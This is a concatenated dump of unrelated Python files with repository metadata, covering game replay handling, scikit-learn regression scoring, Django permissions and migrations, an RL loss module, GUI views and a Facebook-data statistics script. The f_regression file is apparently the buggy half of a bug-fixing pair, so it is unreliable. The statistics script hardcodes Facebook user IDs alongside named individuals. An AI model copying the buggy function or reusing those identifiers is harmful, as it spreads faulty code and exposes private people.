""" This class wraps _SquadInvitationsHandler in order to simulate player's
actions with dyn squads during replay."""
__slots__ = ()
def __init__(self, setup):
super(_SquadInvitationsPlayer, self).__init__(setup)
setCallback = BattleReplay.g_replayCtrl.setDataCallback
for action, method in [(_SEND_ACTION_NAME, self.__onSend), (_ACCEPT_ACTION_NAME, self.__onAccept), (_REJECT_ACTION_NAME, self.__onReject)]:
setCallback(action, method)
def clear(self):
delCallback = BattleReplay.g_replayCtrl.delDataCallback
for eventName, method in [(_SEND_ACTION_NAME, self.__onSend), (_ACCEPT_ACTION_NAME, self.__onAccept), (_REJECT_ACTION_NAME, self.__onReject)]:
delCallback(eventName, method)
super(_SquadInvitationsPlayer, self).clear()
def __onSend(self, _, playerID):
self.send(playerID)
def __onAccept(self, _, playerID):
self.accept(playerID)
def __onReject(self, _, playerID):
self.reject(playerID)
def createInvitationsHandler(setup):
if setup.isReplayPlaying:
handler = _SquadInvitationsPlayer(setup)
elif setup.isReplayRecording:
handler = _SquadInvitationsRecorder(setup)
else:
handler = _SquadInvitationsHandler(setup)
return handler
# okay decompyling c:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\client\gui\battle_control\arena_info\invitations.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.08.29 21:44:27 Central Europe (Daylight Saving Time)
| [
"[email protected]"
]
| |
fee6c4374d7d6e9eceaa09cf64c3bf93594efe6c | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-1/9960b43c9cc1e2a2e58da7952283f93d09a1fdc0-<f_regression>-bug.py | 1f2d5280f165e64d4a762027a36feb370bb04cf1 | []
| no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,406 | py |
def f_regression(X, y, center=True):
'Univariate linear regression tests.\n\n Linear model for testing the individual effect of each of many regressors.\n This is a scoring function to be used in a feature seletion procedure, not\n a free standing feature selection procedure.\n\n This is done in 2 steps:\n\n 1. The correlation between each regressor and the target is computed,\n that is, ((X[:, i] - mean(X[:, i])) * (y - mean_y)) / (std(X[:, i]) *\n std(y)).\n 2. It is converted to an F score then to a p-value.\n\n For more on usage see the :ref:`User Guide <univariate_feature_selection>`.\n\n Parameters\n ----------\n X : {array-like, sparse matrix} shape = (n_samples, n_features)\n The set of regressors that will be tested sequentially.\n\n y : array of shape(n_samples).\n The data matrix\n\n center : True, bool,\n If true, X and y will be centered.\n\n Returns\n -------\n F : array, shape=(n_features,)\n F values of features.\n\n pval : array, shape=(n_features,)\n p-values of F-scores.\n\n\n See also\n --------\n mutual_info_regression: Mutual information for a continuous target.\n f_classif: ANOVA F-value between label/feature for classification tasks.\n chi2: Chi-squared stats of non-negative features for classification tasks.\n SelectKBest: Select features based on the k highest scores.\n SelectFpr: Select features based on a false positive rate test.\n SelectFdr: Select features based on an estimated false discovery rate.\n SelectFwe: Select features based on family-wise error rate.\n SelectPercentile: Select features based on percentile of the highest\n scores.\n '
(X, y) = check_X_y(X, y, ['csr', 'csc', 'coo'], dtype=np.float64)
n_samples = X.shape[0]
if center:
y = (y - np.mean(y))
if issparse(X):
X_means = X.mean(axis=0).getA1()
else:
X_means = X.mean(axis=0)
X_norms = np.sqrt((row_norms(X.T, squared=True) - (n_samples * (X_means ** 2))))
else:
X_norms = row_norms(X.T)
corr = safe_sparse_dot(y, X)
corr /= X_norms
corr /= np.linalg.norm(y)
degrees_of_freedom = (y.size - (2 if center else 1))
F = (((corr ** 2) / (1 - (corr ** 2))) * degrees_of_freedom)
pv = stats.f.sf(F, 1, degrees_of_freedom)
return (F, pv)
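

# Minimal usage sketch (illustrative; not part of the original patch): running
# f_regression on a small synthetic problem via sklearn's make_regression.
if __name__ == '__main__':
    from sklearn.datasets import make_regression
    X_demo, y_demo = make_regression(n_samples=50, n_features=4, random_state=0)
    F_demo, pv_demo = f_regression(X_demo, y_demo)
    print(F_demo.shape, pv_demo.shape)  # -> (4,) (4,)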
| [
"[email protected]"
]
| |
6cec2962afd83940865d9b5121ea405fb2a72374 | c5dae77bb3ec7b39dca5c5c0522e101c4cb6d5a8 | /rooms/permissions.py | 8e1b5f8ec4de3e3507e9a1b899d0fbe75120a6cc | []
| no_license | Parkyes90/airbnb-api | f0726018738aad8eaf4ea891bb3de076ad875a36 | f80864757433d0ea0421b2f47d2daab9cf02915f | refs/heads/master | 2023-04-28T21:53:31.687273 | 2022-12-24T01:38:24 | 2022-12-24T01:38:24 | 243,207,499 | 0 | 0 | null | 2023-08-17T17:23:51 | 2020-02-26T08:19:24 | Python | UTF-8 | Python | false | false | 320 | py | from rest_framework.permissions import BasePermission
class IsOwner(BasePermission):
def has_object_permission(self, request, view, obj):
if not hasattr(obj, "user"):
raise Exception("해당 모델이 사용자 필드를 가지고 있지 않습니다.")
return obj.user == request.user
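

# Illustrative usage sketch (hypothetical viewset, not part of this app):
#
#   from rest_framework import viewsets
#
#   class RoomViewSet(viewsets.ModelViewSet):
#       permission_classes = [IsOwner]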
| [
"[email protected]"
]
| |
1cb53ce92897d65d05b8eb78e9534d4bee7e0ba5 | 0fd9644616b5658ea960ef86f28b94cc95ce55e0 | /djangoprj/mikrotik/migrations/0005_mtusers.py | 744c7b72dff4e87a2d85c4bf78cfde2cdfeb1802 | []
| no_license | zdimon/time-control | f4db6f26f15a18c89b91dba3f69a696a9d3a6c28 | 3a212d26dcaae13d3ca5a18247a425f63938fd7c | refs/heads/master | 2020-05-13T16:33:53.011992 | 2019-04-19T07:05:01 | 2019-04-19T07:05:01 | 181,640,210 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 631 | py | # Generated by Django 2.2 on 2019-04-17 07:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mikrotik', '0004_auto_20190417_0640'),
]
operations = [
migrations.CreateModel(
name='MTUsers',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('ip', models.CharField(max_length=250)),
('host', models.CharField(max_length=250)),
('mac', models.CharField(max_length=250)),
],
),
]
| [
"[email protected]"
]
| |
5d1c155d585d3b0a1036f0568b04008eafae631a | 5ccd63bc0a51f6cbf8431395e69d263b88c3434d | /agents/policy_gradient/modules/generalized_onpolicy_loss.py | f72276336ffbfb188fb8f2fe5c2ebb405446b09d | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | google-research/seed_rl | 12076a223365c700772e9e1ec5fdf6e6aa3dc67d | 0e1e0ac9178a670ad1e1463baed92020e88905ec | refs/heads/master | 2023-08-25T05:07:19.775923 | 2022-11-29T12:41:08 | 2022-11-29T12:41:08 | 215,027,338 | 818 | 164 | Apache-2.0 | 2023-01-16T11:48:01 | 2019-10-14T11:35:42 | Python | UTF-8 | Python | false | false | 11,465 | py | # coding=utf-8
# Copyright 2019 The SEED Authors
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements a generalized onpolicy loss."""
import abc
import inspect
import gin
from seed_rl.agents.policy_gradient.modules import logging_module
import tensorflow as tf
@gin.configurable
class GeneralizedOnPolicyLoss(tf.Module, logging_module.LoggingModule):
"""TensorFlow module implementing the generalized onpolicy loss."""
def __init__(self, agent, reward_normalizer, parametric_action_distribution,
advantage_estimator, policy_loss, discount_factor,
regularizer=None, max_abs_reward=None,
handle_abandoned_episodes_properly=True,
huber_delta=None, value_ppo_style_clip_eps=None,
baseline_cost=1., include_regularization_in_returns=False,
frame_skip=1, reward_scaling=1.0):
"""Creates a GeneralizedOnPolicyLoss."""
self._agent = agent
self._reward_normalizer = reward_normalizer
self._parametric_action_distribution = parametric_action_distribution
self._advantage_estimator = advantage_estimator
self._policy_loss = policy_loss
self._regularizer = regularizer
self._max_abs_reward = max_abs_reward
self._reward_scaling = reward_scaling
self._baseline_cost = baseline_cost
# Provided here so that it is shared.
self._discount_factor = discount_factor
self._frame_skip = frame_skip
self._handle_abandoned_episodes_properly = handle_abandoned_episodes_properly
self._value_ppo_style_clip_eps = value_ppo_style_clip_eps
self._include_regularization_in_returns = include_regularization_in_returns
if huber_delta is not None:
self.v_loss_fn = tf.keras.losses.Huber(
delta=huber_delta, reduction=tf.keras.losses.Reduction.NONE)
else:
self.v_loss_fn = tf.keras.losses.MeanSquaredError(
reduction=tf.keras.losses.Reduction.NONE)
def init(self):
for module in self.submodules:
if hasattr(module, 'init'):
if not inspect.signature(module.init).parameters:
module.init()
def compute_advantages(self, agent_state, prev_actions, env_outputs,
agent_outputs, return_learner_outputs=False):
# Extract rewards and done information.
rewards, done, _, abandoned, _ = tf.nest.map_structure(lambda t: t[1:],
env_outputs)
if self._max_abs_reward is not None:
rewards = tf.clip_by_value(rewards, -self._max_abs_reward,
self._max_abs_reward)
rewards *= self._reward_scaling
# Compute the outputs of the neural networks on the learner.
learner_outputs, _ = self._agent((prev_actions, env_outputs),
agent_state,
unroll=True,
is_training=True)
# At this point, we have unroll length + 1 steps. The last step is only used
# as bootstrap value, so it's removed.
agent_outputs = tf.nest.map_structure(lambda t: t[:-1], agent_outputs)
learner_v = learner_outputs.baseline # current value function
learner_outputs = tf.nest.map_structure(lambda t: t[:-1], learner_outputs)
target_action_log_probs = self._parametric_action_distribution(
learner_outputs.policy_logits).log_prob(agent_outputs.action)
behaviour_action_log_probs = self._parametric_action_distribution(
agent_outputs.policy_logits).log_prob(agent_outputs.action)
# Compute the advantages.
if self._reward_normalizer:
corrected_predictions = self._reward_normalizer.correct_prediction(
learner_v)
unnormalized_predictions = self._reward_normalizer.unnormalize_prediction(
corrected_predictions)
else:
corrected_predictions = learner_v
unnormalized_predictions = learner_v
if not self._handle_abandoned_episodes_properly:
abandoned = tf.zeros_like(abandoned)
done_terminated = tf.logical_and(done, ~abandoned)
done_abandoned = tf.logical_and(done, abandoned)
if self._include_regularization_in_returns and self._regularizer:
additional_rewards, _ = self._regularizer(
self._parametric_action_distribution,
learner_outputs.policy_logits,
agent_outputs.policy_logits,
agent_outputs.action, with_logging=False)
assert rewards.shape == additional_rewards.shape
rewards += additional_rewards
# tf.math.pow does not work on TPU so we compute it manually.
adjusted_discount_factor = 1.
for _ in range(self._frame_skip):
adjusted_discount_factor *= self._discount_factor
vs, advantages = self._advantage_estimator(
unnormalized_predictions,
rewards, done_terminated,
done_abandoned,
adjusted_discount_factor,
target_action_log_probs,
behaviour_action_log_probs)
if self._reward_normalizer:
normalized_targets = self._reward_normalizer.normalize_target(vs)
normalized_advantages = self._reward_normalizer.normalize_advantage(
advantages)
self._reward_normalizer.update_normalization_statistics(vs)
else:
normalized_targets = vs
normalized_advantages = advantages
outputs = (normalized_targets, normalized_advantages)
if return_learner_outputs:
outputs += (learner_outputs,)
return outputs
def __call__(self, agent_state, prev_actions, env_outputs, agent_outputs,
normalized_targets=None, normalized_advantages=None):
"""Computes the loss."""
if normalized_targets is None:
normalized_targets, normalized_advantages, learner_outputs = \
self.compute_advantages(
agent_state, prev_actions, env_outputs, agent_outputs,
return_learner_outputs=True)
# The last timestep is only used for computing advantages so we
# remove it here.
agent_state, prev_actions, env_outputs, agent_outputs = \
tf.nest.map_structure(
lambda t: t[:-1],
(agent_state, prev_actions, env_outputs, agent_outputs))
else: # Advantages are already precomputed.
learner_outputs, _ = self._agent((prev_actions, env_outputs),
agent_state,
unroll=True,
is_training=True)
target_action_log_probs = self._parametric_action_distribution(
learner_outputs.policy_logits).log_prob(agent_outputs.action)
behaviour_action_log_probs = self._parametric_action_distribution(
agent_outputs.policy_logits).log_prob(agent_outputs.action)
# Compute the advantages.
if self._reward_normalizer:
corrected_predictions = self._reward_normalizer.correct_prediction(
learner_outputs.baseline)
old_corrected_predictions = self._reward_normalizer.correct_prediction(
agent_outputs.baseline)
else:
corrected_predictions = learner_outputs.baseline
old_corrected_predictions = agent_outputs.baseline
# Compute the advantage-based loss.
policy_loss = tf.reduce_mean(
self._policy_loss(
normalized_advantages,
target_action_log_probs,
behaviour_action_log_probs,
actions=agent_outputs.action,
target_logits=learner_outputs.policy_logits,
behaviour_logits=agent_outputs.policy_logits,
parametric_action_distribution=self._parametric_action_distribution)
)
# Value function loss
v_error = normalized_targets - corrected_predictions
self.log('GeneralizedOnPolicyLoss/V_error', v_error)
self.log('GeneralizedOnPolicyLoss/abs_V_error', tf.abs(v_error))
self.log('GeneralizedOnPolicyLoss/corrected_predictions',
corrected_predictions)
# Huber loss reduces the last dimension so we add a dummy one here.
normalized_targets = normalized_targets[..., tf.newaxis]
corrected_predictions = corrected_predictions[..., tf.newaxis]
v_loss = self.v_loss_fn(normalized_targets, corrected_predictions)
# PPO-style value loss clipping
if self._value_ppo_style_clip_eps is not None:
old_corrected_predictions = old_corrected_predictions[..., tf.newaxis]
clipped_corrected_predictions = tf.clip_by_value(
corrected_predictions,
old_corrected_predictions - self._value_ppo_style_clip_eps,
old_corrected_predictions + self._value_ppo_style_clip_eps)
clipped_v_loss = self.v_loss_fn(normalized_targets,
clipped_corrected_predictions)
v_loss = tf.maximum(v_loss, clipped_v_loss)
v_loss = tf.reduce_mean(v_loss)
# Compute the regularization loss.
if self._regularizer:
per_step_regularization, regularization_loss = self._regularizer(
self._parametric_action_distribution,
learner_outputs.policy_logits,
agent_outputs.policy_logits,
agent_outputs.action)
if not self._include_regularization_in_returns:
regularization_loss += tf.reduce_mean(per_step_regularization)
else:
regularization_loss = 0.
total_loss = policy_loss + self._baseline_cost*v_loss + regularization_loss
return total_loss
class PolicyLoss(tf.Module, metaclass=abc.ABCMeta):
"""Abstract base class for policy losses."""
@abc.abstractmethod
def __call__(self, advantages, target_action_log_probs,
behaviour_action_log_probs):
r"""Computes policy loss.
Args:
advantages: A float32 tensor of shape [T, B] of advantages.
target_action_log_probs: A float32 tensor of shape [T, B] with
log-probabilities of taking the action by the current policy
behaviour_action_log_probs: A float32 tensor of shape [T, B] with
log-probabilities of taking the action by the behavioural policy
Returns:
A float32 tensor of shape [T, B] with the policy loss.
"""
raise NotImplementedError('`__call__()` is not implemented!')
class RegularizationLoss(tf.Module, metaclass=abc.ABCMeta):
"""Abstract base class for policy losses."""
@abc.abstractmethod
def __call__(self, parametric_action_distribution, target_action_logits,
behaviour_action_logits, actions):
r"""Computes regularization loss.
Args:
parametric_action_distribution: Parametric action distribution.
target_action_logits: A float32 tensor of shape [T, B, A] with
the logits of the target policy.
behaviour_action_logits: A float32 tensor of shape [T, B, A] with
the logits of the behavioural policy.
actions: A float32 tensor of shape [T, B, A] with the actions taken by the
behaviour policy.
Returns:
A float32 tensor of shape [T, B] with the regularization loss.
"""
raise NotImplementedError('`__call__()` is not implemented!')
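

# Minimal illustrative subclass (an assumption, not part of SEED RL): a plain
# policy-gradient loss implementing the PolicyLoss interface above. Extra
# keyword arguments passed by GeneralizedOnPolicyLoss are accepted and ignored.
class SimplePolicyGradientLoss(PolicyLoss):
  """Illustrative -(advantage * log pi(a)) loss."""

  def __call__(self, advantages, target_action_log_probs,
               behaviour_action_log_probs, **kwargs):
    return -tf.stop_gradient(advantages) * target_action_log_probs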
| [
"[email protected]"
]
| |
9be35d2a711c8eb0700d7ddfc54912967c9d4596 | ff81a9d7880f1b85a1dc19d5eba5ac72d7179c86 | /pychron/options/views/flux_visualization_views.py | 208b66906956dcd975359ab479acc112319b92dd | [
"Apache-2.0"
]
| permissive | UManPychron/pychron | 2fb7e479a9f492423c0f458c70102c499e1062c4 | b84c9fd70072f9cbda30abe2c471e64fe3dd75d8 | refs/heads/develop | 2022-12-03T23:32:45.579326 | 2020-01-29T19:02:20 | 2020-01-29T19:02:20 | 36,100,637 | 0 | 0 | null | 2015-05-23T00:10:06 | 2015-05-23T00:10:05 | null | UTF-8 | Python | false | false | 2,220 | py | # ===============================================================================
# Copyright 2015 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from chaco.default_colormaps import color_map_name_dict
from traitsui.api import Item, HGroup, VGroup, EnumEditor
from pychron.options.options import SubOptions, AppearanceSubOptions
class FluxVisualizationSubOptions(SubOptions):
def traits_view(self):
grp = VGroup(Item('plot_kind'),
Item('model_kind'))
return self._make_view(grp)
class FluxVisualizationAppearanceSubOptions(AppearanceSubOptions):
def traits_view(self):
twodgrp = VGroup(HGroup(Item('color_map_name',
label='Color Map',
editor=EnumEditor(values=sorted(color_map_name_dict.keys()))),
Item('levels')),
visible_when='plot_kind=="2D"',
label='Options',
show_border=True)
onedgrp = VGroup(Item('marker_size'),
visible_when='plot_kind=="1D"',
label='Options',
show_border=True)
scalegrp = VGroup(Item('flux_scalar', label='Scale', tooltip='Multiple flux by Scale. FOR DISPLAY ONLY'))
return self._make_view(VGroup(twodgrp, onedgrp, scalegrp))
VIEWS = {'main': FluxVisualizationSubOptions,
'appearance': FluxVisualizationAppearanceSubOptions}
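# Illustrative lookup sketch (an assumption about how these VIEWS maps are
# consumed elsewhere in pychron, not code from this file):
#   subview_factory = VIEWS['appearance']  # -> FluxVisualizationAppearanceSubOptions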
# ============= EOF =============================================
| [
"[email protected]"
]
| |
e28c6068b08233751108e44a68f3829d31617344 | 8229176ba618c08e23e47ca4b0a7c1ebeef4d994 | /src/DescriptiveStats.py | 6430639afb563b8258f98091b749e8a170eef2d0 | []
| no_license | benblamey/ben_phd_python | 703997daef090941b2e679dfee1cff78d475fa5f | 7518784270410e2afdb2adfebf97fa1f4286449f | refs/heads/master | 2021-05-04T11:09:21.582715 | 2017-09-18T20:43:32 | 2017-09-18T20:43:32 | 47,449,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,702 | py | from core import *
# Import Datum Types from CSV file
def do_descriptiveStats():
global total_gt_datums
# See: ExportGroundTruthDatumEventTypes in Java.
# a table of the different kinds of datums was exported to CSV (for all user lifestories)
# { ID : datum-classname }
# all the datums -- not just the ground truth datums.
datum_types = {}
# Two strategies for life story selection:
#- Use the latest life story always - recommended for most things - maximizes Ground truth data which "exists" in the life stories (38 missing vs. 104)
#- Use the life story which matches the gold gate doc -this is the only strategy suitable for gold labelling text eval. */
with open(data_dir + 'DatumTypesForPython.csv', 'r') as csvfile: # LATEST
#- these are slightly older and contain slightly more datums!!!!!!!!!!!!!
spamreader = csv.reader(csvfile, delimiter=',')
for row in spamreader:
datum_types[row[0]] = row[1]
print(set(datum_types.values()))
if (len(set(datum_types.keys())) != total_gt_datums):
print("Number of GT datums defined in core.py = " + str(total_gt_datums))
print("Number of GT datums in DatumTypesForPython.csv = " + str(len(set(datum_types.keys()))))
# raise Exception("gt datum count does not match")
pp = pprint.PrettyPrinter(indent=4)
client = pymongo.MongoClient("localhost", 27017) # previously using 1234 for tunnel.
users = client.SocialWorld.users
print("number of users: " + str(users.count()))
data = []
excluded_datums = 0
for user in users.find():
print(user["FACEBOOK_USER_ID"])
if (user[u"FACEBOOK_USER_ID"] == u"16457018212"):
continue # Unknown randomer
if (user[u"FACEBOOK_USER_ID"] == u"836555706"):
continue # Muhamed Mustafa
if (user[u"FACEBOOK_USER_ID"] == u"100005149806497"):
continue # Felix Smith
if "GROUND_TRUTH_EVENTS" in user:
fullname = user[u"FACEBOOK_FIRST_NAME"] + user[u"FACEBOOK_LAST_NAME"]
print("fullname: " + fullname) #.encode(sys.stdout.encoding, errors = 'replace'))
usergts = user["GROUND_TRUTH_EVENTS"]
data_user = []
for gtec in usergts["events"]:
data_user_datums = []
# lookup the datum IDs in the dictionary
# [3:] #strip off 'fb_' at the start
for datum in gtec["datums"]:
datum_num_id = datum['id']
if (datum_num_id.startswith('fb_')):
datum_num_id = datum_num_id[3:]
# We exclude datums that are missing from the latest life story.
if (datum_num_id in datum_types):
datumtype = datum_types[datum_num_id]
data_user_datums.append((datum_num_id, datumtype))
else:
excluded_datums += 1
if (len(data_user_datums) > 0):
data_user.append(data_user_datums)
if (len(data_user)>0):
data.append(data_user)
table_data = []
table_data.append(("Participants", users.count()))
table_data.append(("...who created ground truth event clusters",len(data)))
table_data.append(("Total ground truth event clusters",
sum(len(user) for user in data)))
table_data.append(("Mean clusters per user",
"{:.2f}".format(
float(sum(len(user) for user in data))/ # no of clusters
users.count()) # no of users
))
total_gt_datums_calc = len(list(chain.from_iterable(chain.from_iterable(data))))
print("total_gt_datums: ")
print(total_gt_datums)
print("total_gt_datums_calc: ")
print(total_gt_datums_calc) # GT datums from MongoDB
assert(total_gt_datums == total_gt_datums_calc)
table_data.append(("Total datums in ground truth clusters", total_gt_datums))
table_data.append(("Mean datums per cluster",
"{:.2f}".format(
float(len(list(chain.from_iterable(chain.from_iterable(data))))) # total datums
/sum(len(user) for user in data) # total clusters
)
))
#print "List of Number of Ground Truth Event Clusters per User"
number_of_gt_events_per_user = list(len(user_events) for user_events in data)
#pp.pprint(number_of_gt_events_per_user)
#print "List of Number of Datums per Ground Truth Event Cluster"
number_of_datums_per_gt_event_cluster = [len(list(gt_cluster)) for gt_cluster in chain.from_iterable(data)]
#pp.pprint(number_of_datums_per_gt_event_cluster)
#table_data.append(("Total ground truth event clusters", total_gtecs))
#table_data.append(("Total ground truth event cluster datums", total_gtecdatums))
print("#### Excluded Datums: " + str(excluded_datums) + "####") # under latest=38,gold_or_latest=?
pp.pprint(table_data)
# Generate Data for Bar Chart
# Frequency of Number of Ground Truth Event Clusters per User
# =========
gteventsizes = number_of_gt_events_per_user
xvalues = range(1,max(gteventsizes)+1)
gt_events_per_user_graph_data = [0] * max(gteventsizes)
print(xvalues)
for (x,f) in Counter(gteventsizes).items():
gt_events_per_user_graph_data[x-1] = f
print(gt_events_per_user_graph_data )
width = 1
xlabels = range(0,max(gteventsizes)+2, 2)
xlabels_positions = [x + 0.5 for x in xlabels]
xminorformatter = FixedLocator([x - 0.5 for x in xlabels])
bar(xvalues, gt_events_per_user_graph_data, width=width, linewidth=1)
yticks(range(0, max(gt_events_per_user_graph_data)+2))
xticks(xlabels_positions, xlabels)
xlabel("# Ground Truth Events for User")
ylabel("Frequency")
xlim(0, max(xlabels)+1)
# The function gca() returns the current axes - instance of http://matplotlib.org/api/axes_api.html#matplotlib.axes.Axes
gca().get_xaxis().set_minor_locator(xminorformatter)
gca().get_xaxis().tick_bottom()
gca().get_yaxis().tick_left()
savefig(phd_output_dir+"ch5_gen_freqGTusers.png", dpi=600, figsize=(8, 6))
savefig(phd_output_dir+"ch5_gen_freqGTusers.pdf", dpi=600, figsize=(8, 6))
#title("Frequency of Number of Ground Truth Event Clusters per User")
# Frequency of Number of Datums per Ground Truth Event Cluster
# ============================================================
gtecsizes = number_of_datums_per_gt_event_cluster
xvalues = range(1,max(gtecsizes)+1)
datums_per_event_cluster_graph_data = [0] * max(gtecsizes)
print(xvalues)
for (x,f) in Counter(gtecsizes).items():
datums_per_event_cluster_graph_data[x-1] = f
print(datums_per_event_cluster_graph_data )
#import numpy
#xlocations = numpy.array(range(len(gteventsizes)))+0.5
#xlocations = xlocations+ width/2 * 2
#print xlocations
width = 1
xlabels = range(0,max(gtecsizes)+2, 2)
xlabels_positions = [x + 0.5 for x in xlabels]
xminorformatter = FixedLocator([x - 0.5 for x in xlabels])
#print xlocations
#import matplotlib.font_manager as font_manager
#prop = font_manager.FontProperties(fname='C:/windows/fonts/cmunrm.ttf')
#mpl.rcParams['font.family'] = prop.get_name()
#font = {'family' : prop.get_name(),
# #'weight' : 'bold',
# #'size' : 10
# }
#rcParams['font.family'] = 'serif'
# font.cursive: [u'Apple Chancery', u'Textile', u'Zapf Chancery', u'Sand', u'cursive']
#font.family: [u'serif']
#font.fantasy: [u'Comic Sans MS', u'Chicago', u'Charcoal', u'ImpactWestern', u'fantasy']
#font.monospace: [u'Bitstream Vera Sans Mono', u'DejaVu Sans Mono', u'Andale Mono', u'Nimbus Mono L', u'Courier New', u'Courier', u'Fixed', u'Terminal', u'monospace']
#font.sans-serif: [u'Bitstream Vera Sans', u'DejaVu Sans', u'Lucida Grande', u'Verdana', u'Geneva', u'Lucid', u'Arial', u'Helvetica', u'Avant Garde', u'sans-serif']
#font.serif: [u'CMU Serif']
#rcParams['font.fantasy'] = prop.get_name()
#rcParams['font.monospace'] = prop.get_name()
#rcParams['font.sans-serif'] = prop.get_name()
#rcParams['font.serif'] = prop.get_name()
#print rcParams
bar(xvalues, datums_per_event_cluster_graph_data, width=width, linewidth=1)
yticks(range(0, max(datums_per_event_cluster_graph_data)+10, 10))
xticks(xlabels_positions, xlabels)
xlim(0, max(xlabels)+1)
xlabel("# Datums in Ground Truth Event Cluster")#, fontdict=font)
ylabel("Frequency")
# The function gca() returns the current axes - instance of http://matplotlib.org/api/axes_api.html#matplotlib.axes.Axes
gca().get_xaxis().set_minor_locator(xminorformatter)
gca().get_xaxis().tick_bottom()
gca().get_yaxis().tick_left()
savefig(phd_output_dir+"ch5_gen_freqGTevents.png", dpi=600, figsize=(8, 6))
savefig(phd_output_dir+"ch5_gen_freqGTevents.pdf", dpi=600, figsize=(8, 6))
#title("Frequency of Number of Datums per Ground Truth Event Cluster")
# Types in GT Event Clusters
# =======
# In[6]:
datum_type_counts = Counter()
for user in data:
for gt_event_cluster in user:
for datum in gt_event_cluster:
datum_type = datum[1]
datum_type_counts[datum_type] += 1
pretty_labels = {
'benblamey.saesneg.model.datums.DatumPhoto': 'Photo',
'benblamey.saesneg.model.datums.DatumStatusMessage': 'Status Message',
'benblamey.saesneg.model.datums.DatumCheckin': 'Check-In',
'benblamey.saesneg.model.datums.DatumEvent': 'Facebook Event',
'mixed': '(Mixed)',
}
#t = sum(x_list)
#cluster_type_comp_table_data = zip(label_list, x_list, [("{:.2f}".format(
# (float(x)/t) * 100) + "\%") # \% is for latex.
# for x in x_list ])
label_list = [pretty_labels[key] for key in datum_type_counts.keys()]
values = datum_type_counts.values()
    datum_type_table_data = list(zip(label_list, values))  # list() so the .append() below works on Python 3
#cluster_type_comp_table_data = sorted(cluster_type_comp_table_data, key=lambda x: x[1], reverse=True) # %'s are strings! sort on col.2
#cluster_type_comp_table_data.reverse()
#print cluster_type_comp_table_data
hr = ['Type','Frequency']
datum_type_table_data.append(("\midrule Total", sum(values)))
t = matrix2latex.matrix2latex(datum_type_table_data,
headerRow = hr,
filename=phd_output_dir+'ch5_table_gen_datums_by_type',
caption='Frequency of Datum by Type',
alignment='r r')
print(t)
# In[7]:
#Number of types in each gt event cluster
types_in_gt_clusters = [set([datum[1] for datum in gt_event_cluster]) for gt_event_cluster in list(chain.from_iterable(data))]
#pp.pprint(types_in_gt_clusters)
gt_cluster_type_counter = Counter()
for types in types_in_gt_clusters:
if (len(types) == 1):
type = next(iter(types))
else:
type = 'mixed'
gt_cluster_type_counter[type] += 1
pp.pprint(gt_cluster_type_counter)
# In[8]:
print(gt_cluster_type_counter.keys())
label_list = [pretty_labels[label] for label in gt_cluster_type_counter.keys()]
x_list = gt_cluster_type_counter.values()
clf()
axis("equal")
pie(
x_list,
labels=label_list,
autopct=None,
#startangle=45
#autopct="%1.1f%%",
#pctdistance=0.8
)
#savefig(phd_output_dir+"ch5_gen_GTtypepie.png", dpi=600, figsize=(8, 6))
savefig(phd_output_dir+"ch5_gen_GTtypepie.pdf", dpi=600, figsize=(8, 6))
# In[9]:
t = sum(x_list)
cluster_type_comp_table_data = zip(label_list, x_list, [("{:.2f}".format(
(float(x)/t) * 100) + "\%") # \% is for latex.
for x in x_list ])
cluster_type_comp_table_data = sorted(cluster_type_comp_table_data, key=lambda x: x[1], reverse=True) # %'s are strings! sort on col.2
#cluster_type_comp_table_data.reverse()
print(cluster_type_comp_table_data)
hr = ['Type(s) in Event Cluster','Frequency','']
cluster_type_comp_table_data.append(("\midrule Total", t, ""))
t = matrix2latex.matrix2latex(cluster_type_comp_table_data,
headerRow = hr,
filename=phd_output_dir+'ch5_table_gen_gt_comp_by_type',
caption='Ground Truth Cluster Datums by Type',
alignment='r r r')
print(t)
# X-Type Matrix
# ====
# Postive/Intra Cases
cross_types_matrix = Counter()
    all_types = set()  # built-in set (the Python 2 sets.Set is neither imported nor available here)
for user in data:
for gtec in user:
for x in gtec:
x_id = x[0]
x_type = x[1]
all_types.add(x_type)
for y in gtec:
y_id = y[0]
y_type = y[1]
if (x_type > y_type):
continue
if (x_id == y_id):
continue
types = [x_type,y_type]
types.sort()
types = tuple(types)
cross_types_matrix[types] += 1
pp.pprint (cross_types_matrix)
print((all_types))
# Negative/Inter Cases
inter_cross_types_matrix = Counter()
for user in data:
for cluster_x in user:
for cluster_y in user:
if (cluster_x == cluster_y): # this works.
continue
for x_datum in cluster_x:
x_type = x_datum[1]
for y_datum in cluster_y:
y_type = y_datum[1]
if (x_type > y_type):
continue
types = [x_type,y_type]
types.sort()
types = tuple(types)
inter_cross_types_matrix[types] += 1
# In[12]:
all_types_sorted = list(all_types)
all_types_sorted.sort()
all_types_sorted_reversed = list(all_types_sorted)
all_types_sorted_reversed.reverse()
pair_table_data = []
header_row = list(all_types_sorted)
header_row = [pretty_labels[typestring] for typestring in header_row]
header_row.insert(0,"")
